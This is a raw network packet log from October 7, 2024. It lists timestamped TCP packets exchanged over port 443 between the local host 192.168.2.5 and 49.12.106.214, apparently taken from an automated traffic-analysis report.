                                                                                                                                                                                        Oct 7, 2024 20:35:36.740490913 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.740528107 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.755038023 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.755053997 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.755093098 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.755098104 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.755137920 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.766261101 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.766278028 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.766340017 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.766345024 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.766388893 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.774672985 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.774689913 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.774749994 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.774755001 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.774794102 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.784302950 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.784322023 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.784384966 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.784389973 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.784426928 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.792104006 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.792120934 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.792404890 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.792409897 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.792448997 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.800211906 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.800230980 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.800302029 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.800307035 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.800344944 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.810697079 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.810714960 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.810786963 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.810791969 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.810833931 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.828752041 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.828768969 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.828840971 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.828846931 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.828883886 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.844152927 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.844168901 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.844238997 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.844245911 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.844278097 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.856359005 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.856376886 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.856434107 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.856440067 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.856472015 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.868462086 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.868479013 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.868549109 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.868557930 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.868592978 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.874042988 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.874058008 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.874109030 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.874114990 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.874151945 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.885936022 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.885951996 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.886020899 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.886027098 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.886065960 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.888998032 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.889031887 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.889058113 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.889060974 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.889071941 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:36.889091969 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.889111996 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.897025108 CEST49860443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:36.897032976 CEST4434986049.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:37.150777102 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:37.150819063 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:37.150895119 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:37.151125908 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:37.151141882 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:37.778714895 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:37.780066967 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:37.780375004 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:37.780395985 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:37.781800985 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:37.781807899 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.194221020 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.194252014 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.194267988 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.194463015 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.194482088 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.194642067 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.223889112 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.223922968 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.224200964 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.224271059 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.224446058 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.288602114 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.288638115 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.288753986 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.288775921 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.288820982 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.318753004 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.318784952 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.318836927 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.318847895 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.318897963 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.355959892 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.355986118 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.356035948 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.356044054 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.356096029 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.379967928 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.379995108 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.380069971 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.380076885 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.380147934 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.399622917 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.399650097 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.399738073 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.399749041 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.399792910 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.414705038 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.414731026 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.414771080 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.414829969 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.414835930 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.414900064 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.432395935 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.432418108 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.432473898 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.432481050 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.432521105 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.449736118 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.449765921 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.449819088 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.449826002 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.449872017 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.449894905 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.463447094 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.463470936 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.463537931 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.463546991 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.463567972 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.463691950 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479501963 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479526043 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479581118 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479593992 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479625940 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.479636908 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490262985 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490281105 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490336895 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490345955 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490375996 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.490387917 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499351978 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499372005 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499454021 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499469995 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499483109 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.499547958 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509167910 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509192944 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509236097 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509283066 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509289026 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.509382010 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516236067 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516258001 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516307116 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516315937 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516344070 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.516361952 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.524641991 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.524667025 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.524728060 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.524738073 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.524780035 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534374952 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534399986 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534440994 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534473896 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534481049 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.534578085 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545553923 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545583010 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545639038 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545646906 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545686007 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.545697927 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558334112 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558362007 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558439970 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558448076 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558482885 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.558504105 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571434975 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571460009 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571511984 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571520090 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571543932 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.571567059 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582096100 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582128048 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582169056 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582180023 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582222939 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.582245111 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590111971 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590145111 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590235949 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590235949 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590245008 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590471983 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.599482059 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.599505901 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.599617958 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.599627018 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.599667072 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.607052088 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.607074022 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.607165098 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.607173920 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.607218027 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.614701033 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.614717960 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.614780903 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.614790916 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.614834070 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.630002975 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.630023956 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.630094051 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.630101919 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.630146027 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.642694950 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.642713070 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.642796040 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.642806053 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.642848015 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.655796051 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.655822039 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.655893087 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.655903101 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.655949116 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670500040 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670527935 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670588970 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670600891 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670617104 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670645952 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.676013947 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.676031113 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.676088095 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.676096916 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.676139116 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.684012890 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.684034109 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.684103966 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.684113026 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.684155941 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.692022085 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.692049026 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.692107916 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.692116022 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.692133904 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.694017887 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.699398041 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.699434042 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.699472904 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.699480057 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.699506998 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.699527025 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.722670078 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.722691059 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.722812891 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.722826958 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.722893953 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.727370024 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.727421045 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.727524996 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.727545977 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.727600098 CEST49875443192.168.2.549.12.106.214
